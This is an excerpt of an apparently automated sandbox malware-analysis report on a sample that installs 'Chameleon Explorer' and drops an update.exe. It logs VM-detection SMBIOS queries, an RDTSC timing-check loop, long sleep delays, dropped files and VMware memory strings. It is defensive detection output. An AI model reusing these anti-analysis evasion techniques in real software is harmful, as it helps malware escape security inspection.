                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Users\user\AppData\Roaming\update.exeRDTSC instruction interceptor: First address: 46B29E second address: 46B29E instructions: 0x00000000 rdtsc 0x00000002 test dl, 00000022h 0x00000005 test ch, 00000000h 0x00000008 test dh, ah 0x0000000a cmp ecx, 00FFFFFFh 0x00000010 jne 00007F12085027D2h 0x00000012 cmp dx, cx 0x00000015 test edx, edx 0x00000017 test eax, ecx 0x00000019 inc ecx 0x0000001a test edx, eax 0x0000001c cmp al, dl 0x0000001e test ah, ah 0x00000020 rdtsc
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004162B0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,GetCurrentProcessId,21_2_004162B0
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWindow / User API: threadDelayed 1777Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWindow / User API: threadDelayed 7812Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWindow / User API: threadDelayed 461
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-JAVSO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-F1F8N.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N60P6.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-GJT7J.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmpJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dllJump to dropped file
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-614
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeAPI coverage: 7.0 %
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpAPI coverage: 8.7 %
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe TID: 3940Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe TID: 6428Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe TID: 5180Thread sleep time: -177700s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe TID: 5180Thread sleep time: -781200s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe TID: 1004Thread sleep time: -46100s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\update.exe TID: 6352Thread sleep count: 90 > 30
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeLast function: Thread delayed
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeLast function: Thread delayed
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0355A504 FindFirstFileW,FindClose,2_2_0355A504
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_03559F38 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,2_2_03559F38
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_0295A504 FindFirstFileW,16_2_0295A504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 17_2_029DA504 FindFirstFileW,17_2_029DA504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 18_2_029AA504 FindFirstFileW,18_2_029AA504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 19_2_02A7A504 FindFirstFileW,19_2_02A7A504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 20_2_03330280 FindFirstFileW,FindClose,20_2_03330280
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004099C0 FreeLibrary,FindFirstFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,RemoveDirectoryW,21_2_004099C0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413030 FindFirstFileW,FindNextFileW,FindClose,21_2_00413030
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,21_2_004119A8
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004119AC FindFirstFileW,FindNextFileW,FindClose,21_2_004119AC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,21_2_00412D6C
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_0041160C FindFirstFileW,FindNextFileW,FindClose,21_2_0041160C
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,21_2_00413F58
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,21_2_00413F58
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 22_2_02A1A504 FindFirstFileW,22_2_02A1A504
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0355AFF0 GetSystemInfo,2_2_0355AFF0
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.iniJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2908784857.0000000006BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976669015.00000000016BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F6F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.NoneNo Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..........
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2027394233.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2416967667.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2339435855.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2295184572.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2009801141.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2279481529.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2310511961.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2869116933.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2347842084.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2374339256.0000000003F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2592944717.00000000052EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW2
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2165295650.000000000523D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2600737948.00000000052DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1971592838.00000000016C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2465984831.0000000005283000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.No
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2801035083.000000000530E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: (2 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2373876593.0000000005291000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.208292
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.2211211842u
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2713353775.000000000530E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES13
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2610909014.00000000052F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VM
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2784063600.000000000535E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2516389611.00000000052C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.0
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2465984831.0000000005283000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d9 3b f0VMware20,1
                    Source: ChameleonFolder.exe, 0000000B.00000002.2929217475.0000000000C73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 13
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2622200268.00000000052E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f#
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwarey
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2462942211.0000000005291000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006925000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.22112118
                    Source: ChameleonExplorer.exe, 00000004.00000003.1812504179.0000000003D53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006925000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1api32.dll
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2766996554.0000000005317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, In
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2934722928.00000000016B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW07
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2298878608.000000000526D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2004143273.00000000051F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMwa
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2668005016.00000000052E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMwar_
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f0.VMware
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2915061860.0000000006BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2513311449.00000000052B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMwarey
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2902133677.0000000006BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2876513835.0000000006BD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2792234245.000000000535C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2465984831.0000000005283000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareX
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2236334515.0000000005241000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2960846322.00000000051F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 t
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1898682933.000000000303D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/20220
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2124478117.00000000051F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 t
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
